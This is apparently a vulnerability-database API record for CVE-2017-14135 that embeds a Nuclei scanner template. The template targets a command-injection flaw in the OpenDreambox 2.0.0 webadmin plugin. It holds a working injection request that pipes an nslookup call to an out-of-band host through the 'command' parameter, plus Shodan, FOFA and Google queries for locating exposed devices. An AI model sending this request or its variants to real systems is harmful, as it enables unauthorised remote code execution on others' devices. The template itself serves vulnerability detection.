{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-14135/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-14135/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-14135/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-14135/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-14135/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-14135"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-14135"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2017/CVE-2017-14135.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2017-14135\n\ninfo:\n  name: OpenDreambox 2.0.0 - Remote Code Execution\n  author: alph4byt3\n  severity: critical\n  description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n  remediation: |\n    Apply the latest security patches or upgrade to a patched version of OpenDreambox.\n  reference:\n    - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/\n    - https://www.exploit-db.com/exploits/42293\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-14135\n    - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/\n    - https://github.com/qazbnm456/awesome-cve-poc\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2017-14135\n    cwe-id: CWE-78\n    epss-score: 0.21842\n    epss-percentile: 0.97537\n    cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: dreambox\n    product: opendreambox\n    shodan-query:\n      - title:\"Dreambox WebControl\"\n      - http.title:\"dreambox webcontrol\"\n    fofa-query: title=\"dreambox webcontrol\"\n    google-query: intitle:\"dreambox webcontrol\"\n  tags: cve,cve2017,dreambox,rce,oast,edb,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"/bin/sh\"\n          - \"/usr/script\"\n        condition: and\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402203766ddba98dfa93c2481d558d3f31febfc3a0d2cb11fe041a4a3e436afa193a00220582fdcf7e72cdf6a41c23f9e887a55dba1dfe1ab3a3b25d22cedde1000837d03:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2017-14135"
}